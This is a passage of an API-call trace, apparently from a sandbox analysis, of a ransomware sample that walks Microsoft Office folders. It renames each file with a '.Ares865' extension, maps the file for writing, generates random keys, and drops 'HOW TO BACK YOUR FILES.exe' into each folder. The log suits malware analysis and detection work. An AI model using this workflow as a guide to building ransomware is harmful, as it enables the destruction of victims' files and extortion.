dwNumberOfBytesToMap=0x1440) returned 0x1a0000 [0064.729] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0064.730] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0064.730] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0064.730] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0064.730] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\DataType\\Tags.accft.Ares865") returned 83 [0064.731] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\DataType\\Tags.accft" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\datatype\\tags.accft"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\DataType\\Tags.accft.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\datatype\\tags.accft.ares865"), dwFlags=0x1) returned 1 [0064.731] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\DataType\\Tags.accft.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\datatype\\tags.accft.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0064.731] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=4343) returned 1 [0064.731] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3440020 [0064.732] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0064.732] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0064.732] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0064.732] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0064.732] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0064.733] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1400, lpName=0x0) returned 0x118 [0064.734] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1400) returned 0x1a0000 [0064.735] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0064.736] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0064.736] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0064.736] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0064.737] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Stationery", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Stationery") returned="C:\\Program Files\\Microsoft Office\\Stationery" [0064.737] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Stationery" | out: lpString1="C:\\Program Files\\Microsoft Office\\Stationery") returned="C:\\Program Files\\Microsoft Office\\Stationery" [0064.737] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0064.737] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Stationery\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\stationery\\how to back your files.exe"), bFailIfExists=1) returned 1 [0064.746] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.746] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Stationery\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd3eb50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x58183d80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58183d80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0064.747] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0064.747] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0064.747] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Stationery\\1033", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Stationery\\1033") returned="C:\\Program Files\\Microsoft Office\\Stationery\\1033" [0064.747] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Stationery\\1033" | out: lpString1="C:\\Program Files\\Microsoft Office\\Stationery\\1033") returned="C:\\Program Files\\Microsoft Office\\Stationery\\1033" [0064.747] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0064.747] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Stationery\\1033\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\how to back your files.exe"), bFailIfExists=1) returned 1 [0064.752] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.752] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Stationery\\1033\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xebb910, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x58183d80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58183d80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0064.752] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0064.752] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0064.753] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14") returned="C:\\Program Files\\Microsoft Office\\Office14" [0064.753] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14") returned="C:\\Program Files\\Microsoft Office\\Office14" [0064.753] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0064.753] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\how to back your files.exe"), bFailIfExists=1) returned 1 [0064.756] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.756] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x581a9ee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x581a9ee0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0064.756] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0064.756] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0064.760] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\EXLIRM.XML.Ares865") returned 61 [0064.760] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\EXLIRM.XML" (normalized: "c:\\program files\\microsoft office\\office14\\exlirm.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\EXLIRM.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\exlirm.xml.ares865"), dwFlags=0x1) returned 1 [0064.761] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\EXLIRM.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\exlirm.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0064.761] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=79660) returned 1 [0064.761] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3440020 [0064.762] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d31c0 [0064.762] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0064.762] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0064.762] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0064.762] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0064.763] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a30, lpName=0x0) returned 0x118 [0064.764] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a30) returned 0x420000 [0064.827] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0064.827] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0064.827] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0064.827] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3238 [0064.829] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51243c00, ftCreationTime.dwHighDateTime=0x1c7ae59, ftLastAccessTime.dwLowDateTime=0x60acc8d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x51243c00, ftLastWriteTime.dwHighDateTime=0x1c7ae59, nFileSizeHigh=0x0, nFileSizeLow=0x13574, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EXLIRMV.XML", cAlternateFileName="")) returned 1 [0064.829] lstrcmpiW (lpString1="EXLIRMV.XML", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0064.829] lstrcmpiW (lpString1="EXLIRMV.XML", lpString2="aoldtz.exe") returned 1 [0064.830] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\EXLIRMV.XML.Ares865") returned 62 [0064.830] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\EXLIRMV.XML" (normalized: "c:\\program files\\microsoft office\\office14\\exlirmv.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\EXLIRMV.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\exlirmv.xml.ares865"), dwFlags=0x1) returned 1 [0064.836] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\EXLIRMV.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\exlirmv.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0064.836] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=79220) returned 1 [0064.837] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0064.837] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d31c0 [0064.837] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0064.837] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0064.838] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0064.838] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0064.838] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13880, lpName=0x0) returned 0x118 [0064.839] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13880) returned 0x420000 [0064.844] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0064.844] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0064.844] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0064.844] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3238 [0064.847] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\IPIRM.XML.Ares865") returned 60 [0064.847] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\IPIRM.XML" (normalized: "c:\\program files\\microsoft office\\office14\\ipirm.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\IPIRM.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\ipirm.xml.ares865"), dwFlags=0x1) returned 1 [0064.848] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\IPIRM.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\ipirm.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0064.848] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=79708) returned 1 [0064.848] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0064.849] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3238 [0064.849] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0064.849] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0064.849] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0064.849] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0064.850] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a60, lpName=0x0) returned 0x154 [0064.852] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a60) returned 0x190000 [0064.872] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0064.872] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0064.872] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0064.872] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0064.874] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\IPIRMV.XML.Ares865") returned 61 [0064.874] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\IPIRMV.XML" (normalized: "c:\\program files\\microsoft office\\office14\\ipirmv.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\IPIRMV.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\ipirmv.xml.ares865"), dwFlags=0x1) returned 1 [0064.876] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\IPIRMV.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\ipirmv.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0064.876] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=79268) returned 1 [0064.876] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0064.876] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3238 [0064.876] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0064.876] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0064.877] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0064.877] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0064.877] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x138b0, lpName=0x0) returned 0x154 [0064.879] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x138b0) returned 0x190000 [0064.882] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0064.883] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0064.883] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0064.883] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0064.890] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.BusinessData.xml.Ares865") returned 77 [0064.890] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.BusinessData.xml" (normalized: "c:\\program files\\microsoft office\\office14\\microsoft.businessdata.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.BusinessData.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\microsoft.businessdata.xml.ares865"), dwFlags=0x1) returned 1 [0064.892] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.BusinessData.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\microsoft.businessdata.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0064.892] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=370536) returned 1 [0064.892] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0064.893] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3238 [0064.893] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0064.893] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0064.893] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0064.893] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0064.894] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5aa70, lpName=0x0) returned 0x154 [0064.895] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5aa70) returned 0x420000 [0064.913] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0064.913] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0064.913] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0064.913] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0064.919] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.Office.BusinessApplications.Runtime.xml.Ares865") returned 100 [0064.919] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.Office.BusinessApplications.Runtime.xml" (normalized: "c:\\program files\\microsoft office\\office14\\microsoft.office.businessapplications.runtime.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.Office.BusinessApplications.Runtime.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\microsoft.office.businessapplications.runtime.xml.ares865"), dwFlags=0x1) returned 1 [0064.920] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.Office.BusinessApplications.Runtime.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\microsoft.office.businessapplications.runtime.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0064.920] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=10588) returned 1 [0064.920] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0064.920] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3238 [0064.920] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0064.920] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0064.921] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0064.921] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0064.921] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2c60, lpName=0x0) returned 0x154 [0064.923] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2c60) returned 0x190000 [0064.925] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0064.926] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0064.926] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0064.926] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0064.927] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.Office.BusinessApplications.RuntimeUi.xml.Ares865") returned 102 [0064.927] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.Office.BusinessApplications.RuntimeUi.xml" (normalized: "c:\\program files\\microsoft office\\office14\\microsoft.office.businessapplications.runtimeui.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.Office.BusinessApplications.RuntimeUi.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\microsoft.office.businessapplications.runtimeui.xml.ares865"), dwFlags=0x1) returned 1 [0064.928] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.Office.BusinessApplications.RuntimeUi.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\microsoft.office.businessapplications.runtimeui.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0064.928] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=178) returned 1 [0064.928] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0064.928] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3238 [0064.928] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0064.929] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0064.929] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0064.929] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0064.929] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3c0, lpName=0x0) returned 0x154 [0064.931] 